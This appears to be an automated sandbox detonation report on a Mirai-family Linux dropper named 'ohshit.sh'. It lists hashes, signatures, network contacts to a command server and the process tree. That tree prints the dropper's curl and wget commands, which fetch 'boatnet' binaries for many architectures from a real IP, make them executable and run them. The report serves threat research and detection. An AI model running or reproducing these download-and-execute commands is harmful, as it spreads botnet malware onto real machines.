NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:3778 tcp

Files

/tmp/boatnet.x86

MD5 ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d

memory/1585-1-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1594-2-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1604-3-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1613-4-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1622-5-0x0000000008048000-0x000000000805ce08-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-31 21:05

Reported

2024-08-31 21:06

Platform

debian12-armhf-20240418-en

Max time kernel

60s

Max time network

63s

Command Line

[/tmp/ohshit.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/cat

[cat boatnet.x86]

/usr/bin/chmod

[chmod +x boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-timedated.service-qtJorK WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/cat

[cat boatnet.mips]

/usr/bin/chmod

[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/cat

[cat boatnet.arc]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/cat

[cat boatnet.i468]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/cat

[cat boatnet.i686]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]

/usr/bin/cat

[cat boatnet.x86_64]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]

Network

Country Destination Domain Proto
NL 94.156.71.225:80 94.156.71.225 tcp
US 1.1.1.1:53 debian12-armhf-20240418-en-3 udp
US 1.1.1.1:53 debian12-armhf-20240418-en-3 udp
NL 94.156.71.225:80 94.156.71.225 tcp
US 1.1.1.1:53 debian12-armhf-20240418-en-3 udp
US 1.1.1.1:53 debian12-armhf-20240418-en-3 udp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp

Files

/tmp/boatnet.x86

MD5 ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-31 21:05

Reported

2024-08-31 21:06

Platform

debian12-mipsel-20240729-en

Max time kernel

61s

Max time network

67s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/30/status /tmp/WTF N/A
File opened for reading /proc/16/status /tmp/WTF N/A
File opened for reading /proc/847/status /tmp/WTF N/A
File opened for reading /proc/698/status /tmp/WTF N/A
File opened for reading /proc/6/status /tmp/WTF N/A
File opened for reading /proc/698/status /tmp/WTF N/A
File opened for reading /proc/405/status /tmp/WTF N/A
File opened for reading /proc/858/status /tmp/WTF N/A
File opened for reading /proc/829/status /tmp/WTF N/A
File opened for reading /proc/2/status /tmp/WTF N/A
File opened for reading /proc/11/status /tmp/WTF N/A
File opened for reading /proc/28/status /tmp/WTF N/A
File opened for reading /proc/23/status /tmp/WTF N/A
File opened for reading /proc/31/status /tmp/WTF N/A
File opened for reading /proc/15/status /tmp/WTF N/A
File opened for reading /proc/866/status /tmp/WTF N/A
File opened for reading /proc/11/status /tmp/WTF N/A
File opened for reading /proc/695/status /tmp/WTF N/A
File opened for reading /proc/868/status /tmp/WTF N/A
File opened for reading /proc/869/status /tmp/WTF N/A
File opened for reading /proc/33/status /tmp/WTF N/A
File opened for reading /proc/675/status /tmp/WTF N/A
File opened for reading /proc/118/status /tmp/WTF N/A
File opened for reading /proc/111/status /tmp/WTF N/A
File opened for reading /proc/751/status /tmp/WTF N/A
File opened for reading /proc/843/status /tmp/WTF N/A
File opened for reading /proc/392/status /tmp/WTF N/A
File opened for reading /proc/27/status /tmp/WTF N/A
File opened for reading /proc/112/status /tmp/WTF N/A
File opened for reading /proc/663/status /tmp/WTF N/A
File opened for reading /proc/53/status /tmp/WTF N/A
File opened for reading /proc/5/status /tmp/WTF N/A
File opened for reading /proc/885/status /tmp/WTF N/A
File opened for reading /proc/24/status /tmp/WTF N/A
File opened for reading /proc/843/status /tmp/WTF N/A
File opened for reading /proc/10/status /tmp/WTF N/A
File opened for reading /proc/837/status /tmp/WTF N/A
File opened for reading /proc/34/status /tmp/WTF N/A
File opened for reading /proc/35/status /tmp/WTF N/A
File opened for reading /proc/1/status /tmp/WTF N/A
File opened for reading /proc/827/status /tmp/WTF N/A
File opened for reading /proc/25/status /tmp/WTF N/A
File opened for reading /proc/862/status /tmp/WTF N/A
File opened for reading /proc/875/status /tmp/WTF N/A
File opened for reading /proc/392/status /tmp/WTF N/A
File opened for reading /proc/840/status /tmp/WTF N/A
File opened for reading /proc/674/status /tmp/WTF N/A
File opened for reading /proc/53/status /tmp/WTF N/A
File opened for reading /proc/698/status /tmp/WTF N/A
File opened for reading /proc/17/status /tmp/WTF N/A
File opened for reading /proc/35/status /tmp/WTF N/A
File opened for reading /proc/113/status /tmp/WTF N/A
File opened for reading /proc/59/status /tmp/WTF N/A
File opened for reading /proc/675/status /tmp/WTF N/A
File opened for reading /proc/675/status /tmp/WTF N/A
File opened for reading /proc/24/status /tmp/WTF N/A
File opened for reading /proc/30/status /tmp/WTF N/A
File opened for reading /proc/833/status /tmp/WTF N/A
File opened for reading /proc/7/status /tmp/WTF N/A
File opened for reading /proc/16/status /tmp/WTF N/A
File opened for reading /proc/9/status /tmp/WTF N/A
File opened for reading /proc/840/status /tmp/WTF N/A
File opened for reading /proc/837/status /tmp/WTF N/A
File opened for reading /proc/870/status /tmp/WTF N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/cat

[cat boatnet.x86]

/usr/bin/chmod

[chmod +x boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-timedated.service-9uBzHH WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/cat

[cat boatnet.mips]

/usr/bin/chmod

[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/cat

[cat boatnet.arc]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/cat

[cat boatnet.i468]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/cat

[cat boatnet.i686]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]

/usr/bin/cat

[cat boatnet.x86_64]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]

/usr/bin/cat

[cat boatnet.mpsl]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.m68k]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
NL 94.156.71.225:80 94.156.71.225 tcp
US 1.1.1.1:53 debian12-mipsel-20240729-en-7 udp
US 1.1.1.1:53 debian12-mipsel-20240729-en-7 udp
US 1.1.1.1:53 debian12-mipsel-20240729-en-7 udp
US 1.1.1.1:53 debian12-mipsel-20240729-en-7 udp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp

Files

/tmp/boatnet.x86

MD5 ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d

memory/826-1-0x00400000-0x0043bfb4-memory.dmp

memory/836-2-0x00400000-0x0043bfb4-memory.dmp

memory/846-3-0x00400000-0x0043bfb4-memory.dmp

memory/855-4-0x00400000-0x0043bfb4-memory.dmp

memory/865-5-0x00400000-0x0043bfb4-memory.dmp

memory/874-6-0x00400000-0x0043bfb4-memory.dmp

memory/884-7-0x00400000-0x0043bfb4-memory.dmp

memory/895-8-0x00400000-0x0043bfb4-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-31 21:05

Reported

2024-08-31 21:06

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

60s

Max time network

64s

Command Line

[/tmp/ohshit.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Loads a kernel module

rootkit
Description Indicator Process Target
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A N/A N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A /tmp/WTF N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A

cURL User-Agent

Description Indicator Process Target
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/cat

[cat boatnet.x86]

/usr/bin/chmod

[chmod +x WTF boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/chmod

